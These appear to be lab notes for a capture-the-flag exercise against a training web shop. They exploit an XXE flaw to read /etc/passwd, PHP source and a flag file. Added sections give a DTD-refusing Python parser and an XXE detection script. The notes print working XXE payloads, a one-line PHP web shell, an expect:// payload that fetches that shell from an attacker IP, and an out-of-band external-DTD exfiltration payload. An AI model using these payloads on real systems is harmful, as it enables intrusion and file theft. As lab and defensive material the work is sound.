## `shopdev2.inlanefeight.local`
- visit page ![[images/Pasted image 20260630090210.png]]
- we get in with `admin:admin` ![[images/Pasted image 20260630090247.png]]
- `/checkout.php` submits an XML-based POST request with an ID number ![[images/Pasted image 20260630090643.png]]
- whatever I place in the userid field shows up in the response ![[images/Pasted image 20260630090943.png]]
- try to add XML code > confirmed XXE ![[images/Pasted image 20260630091125.png]]
```xml
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
```
## XXE
- try to read a file
- able to read `/etc/passwd` > we still see that only `root` has a login shell ![[images/Pasted image 20260630091305.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
```
- let's pull `index.php` ![[images/Pasted image 20260630092032.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```
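The reads above work because the application's parser expands general entities, including `SYSTEM` ones, that the request body itself declares. As an added example (stdlib Python, not the lab's PHP code), here is a parse-time control for that `userid` request: it refuses the document the moment a DOCTYPE appears, before any entity in the internal subset can be declared, and switches external entity loading off explicitly. The `<checkout>`/`<userid>` element names are assumed, since the real request only appears in the screenshot.

```python
import io
import xml.sax
from xml.sax import handler

# Added example: a DTD-refusing parse of the checkout request. Element names
# <checkout>/<userid> are assumed; the real form is not shown in the notes.


class XxeRejected(ValueError):
    """Raised when a request body carries a DTD (no legitimate client sends one)."""


class _RefuseDtd:
    """Lexical handler: expat calls startDTD as soon as it sees <!DOCTYPE ...>,
    i.e. before any <!ENTITY> in the internal subset is processed."""

    def startDTD(self, name, public_id, system_id):
        raise XxeRejected(f"DOCTYPE '{name}' not allowed in request body")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


class _UserIdCollector(handler.ContentHandler):
    """Collects the text of the first <userid> element."""

    def __init__(self):
        super().__init__()
        self.userid = None
        self._inside = False

    def startElement(self, name, attrs):
        if name == "userid":
            self._inside, self.userid = True, ""

    def characters(self, content):
        if self._inside:
            self.userid += content

    def endElement(self, name):
        if name == "userid":
            self._inside = False


def parse_checkout(body: bytes) -> str:
    """Return the userid from the request body, or raise XxeRejected on any DTD."""
    parser = xml.sax.make_parser()
    # Never resolve SYSTEM/PUBLIC general entities (the default in current
    # Pythons, but set explicitly so the intent survives a version change).
    parser.setFeature(handler.feature_external_ges, False)
    collector = _UserIdCollector()
    parser.setContentHandler(collector)
    parser.setProperty(handler.property_lexical_handler, _RefuseDtd())
    parser.parse(io.BytesIO(body))
    if collector.userid is None:
        raise ValueError("no <userid> element in request")
    return collector.userid


def is_rejected(body: bytes) -> bool:
    """True when the body is refused because it carries a DTD."""
    try:
        parse_checkout(body)
    except XxeRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample bodies: a normal checkout and the lab's first payload.
    print(parse_checkout(b"<checkout><userid>1337</userid></checkout>"))
    print(is_rejected(b'<!DOCTYPE email [<!ENTITY company "Inlane Freight">]>'
                      b"<checkout><userid>&company;</userid></checkout>"))
```

The PHP-side equivalent for the target is to parse with `simplexml_load_string()` or `DOMDocument::loadXML()` without the `LIBXML_NOENT` and `LIBXML_DTDLOAD` options, and on PHP versions before 8.0 to call `libxml_disable_entity_loader(true)` first; rejecting any body that contains `<!DOCTYPE` is the simpler and more robust rule when the endpoint only expects a user ID.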
## RCE with XXE
- first create `shell.php`, then host it via HTTP ![[images/Pasted image 20260630092622.png]]
```bash
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
```
- now use `expect://` to `curl` `shell.php` from the Kali HTTP server ![[images/Pasted image 20260630092903.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'10.10.15.114:8000/shell.php'">
]>
```
- try to hit `shell.php`
- not getting a hit on the HTTP server
- try switching to `wget`
- still nothing
## CDATA exfil
- XML payload
```xml
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
```
- create the `xxe.dtd` file on Kali and host it via HTTP
- here we are able to hit the HTTP server
```bash
# external DTD: joins the CDATA wrapper entities around the file contents
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# serve xxe.dtd on port 8000 so the target can fetch it
python3 -m http.server 8000
```
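The file-read payloads in the XXE section and the parameter-entity payload above leave the same fingerprints in the request body: a DOCTYPE, `<!ENTITY>` declarations, and `SYSTEM` identifiers whose scheme says what the attacker is after (`file://`, `php://filter`, `expect://`, or a remote `http://` DTD for the out-of-band fetch). The inspector below is an added example, not part of the lab; it pulls every entity declaration out of the internal subset, classifies it, and grades the body so a WAF rule or log review can tell a plain DTD from a file read or an out-of-band DTD fetch. The sample bodies wrap the payloads from these notes inside an assumed `<checkout><userid>` structure (the real form is only visible in the screenshots).

```python
import re
from dataclasses import dataclass
from typing import List

# Added example: request-body inspector for XXE indicators. This is a
# log/WAF-side check; the parser itself must still refuse DTDs.

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name [SYSTEM|PUBLIC] "lit" ["lit"]  (PUBLIC carries pubid then sysid)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[A-Za-z_:][\w.:-]*)\s+(?P<kind>SYSTEM|PUBLIC)?"
    r"(?P<lits>(?:\s*(?:" + r'"[^"]*"' + r"|'[^']*'" + r"))+)",
    re.IGNORECASE,
)
LITERAL_RE = re.compile(r'"([^"]*)"' + r"|'([^']*)'")
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
REMOTE = {"http", "https", "ftp"}
SCHEME_NOTES = {
    "file": "local file read",
    "php": "PHP stream wrapper (php://filter source disclosure)",
    "expect": "expect:// wrapper, command execution if the extension is loaded",
    "http": "out-of-band fetch (external DTD / exfiltration)",
    "https": "out-of-band fetch (external DTD / exfiltration)",
    "ftp": "out-of-band fetch (external DTD / exfiltration)",
}


@dataclass
class EntityFinding:
    name: str
    parameter: bool   # declared with % (parameter entity, usable inside the DTD)
    external: bool    # SYSTEM or PUBLIC
    value: str        # replacement text, or the system identifier
    scheme: str       # URI scheme for external entities, "" otherwise
    note: str


def inspect_xml_body(body: str) -> List[EntityFinding]:
    """Extract every entity declaration from the DOCTYPE internal subset."""
    findings = []
    for m in ENTITY_RE.finditer(body):
        literals = [a or b for a, b in LITERAL_RE.findall(m.group("lits"))]
        external = m.group("kind") is not None
        value = literals[-1]  # last literal is the sysid for PUBLIC, the only one otherwise
        scheme, note = "", "internal entity (replacement text only)"
        if external:
            sm = SCHEME_RE.match(value)
            scheme = sm.group(1).lower() if sm else ""
            note = SCHEME_NOTES.get(scheme, "external entity, unknown scheme")
        findings.append(EntityFinding(m.group("name"), m.group("pe") is not None,
                                      external, value, scheme, note))
    return findings


def risk_level(body: str) -> str:
    """none: no DTD; dtd: DOCTYPE with internal entities only (still reject);
    external: SYSTEM/PUBLIC entity with a local scheme such as file:// or php://;
    oob: an entity that makes the server fetch a remote resource (external DTD)."""
    if not DOCTYPE_RE.search(body):
        return "none"
    findings = inspect_xml_body(body)
    if any(f.scheme in REMOTE for f in findings):
        return "oob"
    if any(f.external for f in findings):
        return "external"
    return "dtd"


def _wrap(dtd: str) -> str:
    # Constructed body: the payload from the notes plus an assumed request shape.
    return dtd + "\n<checkout><userid>&company;</userid></checkout>"


SAMPLES = {
    "benign": "<checkout><userid>1337</userid></checkout>",
    "internal": _wrap('<!DOCTYPE email [\n<!ENTITY company "Inlane Freight">\n]>'),
    "file": _wrap('<!DOCTYPE email [\n<!ENTITY company SYSTEM "file:///etc/passwd">\n]>'),
    "filter": _wrap('<!DOCTYPE email [\n<!ENTITY company SYSTEM '
                    '"php://filter/convert.base64-encode/resource=index.php">\n]>'),
    "expect": _wrap("<!DOCTYPE email [\n<!ENTITY company SYSTEM "
                    "\"expect://curl$IFS-O$IFS'10.10.15.114:8000/shell.php'\">\n]>"),
    "cdata_exfil": ('<!DOCTYPE email [\n<!ENTITY % begin "<![CDATA[">\n'
                    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n<!ENTITY % end "]]>">\n'
                    '<!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd">\n%xxe;\n]>\n'
                    '<checkout><userid>&joined;</userid></checkout>'),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = [(f.name, f.scheme or "-", f.note) for f in inspect_xml_body(body)]
        print(f"{label:12s} risk={risk_level(body):8s} {hits}")
```

The grading deliberately puts the CDATA payload above a plain `file://` read: a parameter entity pointing at a remote DTD means the attacker controls what the parser does next, and the outbound request to port 8000 is also the one signal a network sensor can catch even when the HTTP response reveals nothing.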
![[images/Pasted image 20260630100112.png]]
## read flag
- update the XML payload as below, replacing `email` with `userid`, as that is the variable we are using for XXE
```xml
<!DOCTYPE userid [
<!ENTITY company SYSTEM "file:///flag.txt">
]>
```
- that's the ticket ![[images/Pasted image 20260630170456.png]]